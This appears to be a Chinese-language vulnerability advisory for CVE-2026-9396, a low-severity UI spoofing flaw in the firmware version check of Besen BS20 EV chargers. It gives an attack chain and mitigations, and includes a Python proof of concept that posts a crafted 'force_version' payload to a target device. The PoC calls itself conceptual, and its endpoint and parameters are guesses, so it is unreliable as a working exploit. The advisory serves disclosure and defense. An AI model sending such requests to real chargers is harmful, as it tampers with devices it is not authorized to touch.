CVE-2026-9396 Besen充电桩固件版本检查UI欺骗漏洞

漏洞信息

漏洞编号

CVE-2026-9396

漏洞类型

UI欺骗

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Besen BS20 EV Charging Station

漏洞概述

Besen BS20电动汽车充电站在固件版本20260426及之前版本中存在安全漏洞。该漏洞源于固件版本检查组件对UI层渲染限制不当，允许攻击者进行远程操纵。尽管利用该漏洞需要较高的攻击复杂度，但攻击者无需用户交互即可利用此缺陷实施UI欺骗攻击。这可能导致用户界面显示虚假的固件版本信息，从而影响系统的完整性。目前厂商已收到报告并正在进行安全审查。

技术细节

该漏洞位于Besen BS20充电桩的固件版本检查模块。由于缺乏对渲染UI层的严格限制，攻击者可以通过网络向受影响设备发送特制的数据包。这些数据包能够绕过正常的版本验证逻辑，操纵设备返回或显示的固件版本信息。攻击向量为网络（AV:N），且不需要用户权限（PR:N）。这种技术属于UI欺骗的一种，攻击者并非直接窃取数据或导致拒绝服务，而是通过伪造界面层信息，诱导用户或管理系统认为设备运行在特定的固件版本上。由于攻击复杂度高（AC:H），通常需要对设备协议有深入了解。这种欺骗可能被用于掩盖真实的设备状态，阻碍安全更新或绕过基于版本号的策略检查。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别暴露在互联网上的Besen BS20充电桩设备。

STEP 2

2. 漏洞利用

攻击者向目标设备的固件版本检查接口发送特制的恶意数据包，利用UI层限制不当的缺陷。

STEP 3

3. UI欺骗

设备解析恶意数据包后，在用户界面上渲染攻击者指定的虚假固件版本信息，而非实际版本。

STEP 4

4. 持续影响

用户或管理系统被虚假信息误导，可能延迟安全补丁更新或错误评估设备安全状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-9396: Firmware Version Check Manipulation
# This script demonstrates a potential request to manipulate the UI layer.

import requests

def exploit_ui_spoofing(target_ip):
    """
    Attempts to spoof the firmware version on the target device.
    Note: This is a conceptual PoC based on the vulnerability description.
    """
    url = f"http://{target_ip}/api/get_firmware_info"
    # Malicious headers or payload to bypass UI restrictions
    headers = {
        "User-Agent": "BesenExploit/1.0",
        "Content-Type": "application/json"
    }
    
    # Payload attempting to force a specific version display regardless of actual version
    payload = {
        "force_version": "999.999.999",
        "bypass_check": True
    }
    
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=5)
        if response.status_code == 200:
            print(f"[+] Request sent successfully to {target_ip}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send request. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    exploit_ui_spoofing(target)

影响范围

Besen BS20 EV Charging Station <= 20260426

防御指南

临时缓解措施

建议立即将Besen BS20充电桩的管理接口隔离在受信任的内网环境中，避免直接暴露于公网。同时，密切关注Besen官方发布的安全公告，一旦提供修复补丁，应立即进行固件升级。在未升级前，管理员应通过物理检查或其他可信渠道核实设备版本信息。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9396
3 Details https://www.cvedetails.com/cve/CVE-2026-9396/
4 VulDB https://vuldb.com/cve/CVE-2026-9396
5 Link https://github.com/carfeii/besen#finding-3-firmware-version-check-manipulation-and-ui-spoofing
6 Link https://vuldb.com/submit/813575
7 Link https://vuldb.com/vuln/365377
8 Link https://vuldb.com/vuln/365377/cti